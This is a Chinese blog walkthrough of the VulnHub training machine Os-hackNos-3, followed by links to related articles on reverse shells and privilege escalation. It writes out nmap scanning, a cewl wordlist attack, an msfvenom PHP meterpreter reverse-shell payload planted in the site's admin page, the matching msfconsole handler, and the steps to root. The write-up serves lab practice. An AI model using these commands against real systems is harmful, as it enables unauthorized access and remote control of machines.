vulnhub之Os-hackNos-3的实践

VSole2021-12-26 14:55:46

好久没做攻击实践了,今天看了一下,手里还攒着6个vulnhub的镜像,算了一下,整好春节前把它们都实践完,今天实践的是Os-hackNos-3,

用workstation导入成功,但是扫描不出来地址,换成virtualbox,

sudo netdiscover -r 192.168.56.0/24,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.104,

发现有http服务,名字叫WebSec,猜一个url,

http://192.168.56.104/websec/,下面发现个账户,

从网页内容里爬密码,

sudo cewl http://192.168.56.104/websec/ > passwd.txt,

从头开始试,到contact@hacknos.com/Securityx时成功,

再猜一个url,http://192.168.56.104/websec/admin,登录成功,

找到一个能放反弹shell的地方,

在kali攻击机上生成反弹shell代码,

sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.106 LPORT=4444 R > shell.php,

把代码粘到页面上,保存提交,

在kali攻击机上开个反弹shell的监听,

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.56.106

set LPORT 4444

run

在页面上再次点击保存,反弹shell就过来了,不是root,需要提权,

先转成交互式shell,

python -c 'import pty; pty.spawn("/bin/bash")',

发现个blackdevil账户,又发现可能是密码的加密数据,

去https://www.spammimic.com/spreadsheet.php?action=decode上解密,得到blackdevil的密码,Security@x@,

切换到blackdevil,发现能再直接切到root,搞定,


shellsudo
本作品采用《CC 协议》,转载必须注明作者和本文链接
vulnhub之ha-natraj的实践
2023-05-29 15:40:49
今天实践的是vulnhub的ha-natraj镜像,下载地址,https://download.vulnhu
vulnhub之devguru的实践
2022-07-24 18:44:07
今天实践的是vulnhub的devguru镜像,下载地址,https://download.vulnhub.
vulnhub之darkhole2的实践
2022-07-10 15:32:30
今天实践的是vulnhub的darkhole2镜像,下载地址,https://download.vulnhu
快速了解 Linux Sudo 高危提权漏洞的研究利用。
前言建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会!反向shell-备忘录 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互
好久没做攻击实践了,今天看了一下,手里还攒着6个vulnhub的镜像,算了一下,整好春节前把它们都实践完,今天实践的是Os-hackNos-3, 用workstation导入成功,但是扫描不出来地址,换成virtualbox, sudo netdiscover -r 192.168.56.0/24,
vulnhub之cybox-1.1的实践
2022-08-14 12:30:50
今天实践的是vulnhub的cybox-1.1镜像,下载地址,https://download.vulnhu
描述SUID代表设置的用户ID,是一种Linux功能,允许用户在指定用户的许可下执行文件。
大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件,查看私人信息或安装不需要的程序,例如病毒。
一文吃透 Linux 提权
2021-10-23 07:09:32
特权升级意味着用户获得他们无权获得的特权。通常,当系统存在允许绕过安全性的错误或对使用方法的设计假设存在缺陷时,通常会发生这种情况。结果是,具有比应用程序开发人员或系统管理员想要的特权更多的应用程序可以执行未经授权的操作。
VSole
网络安全专家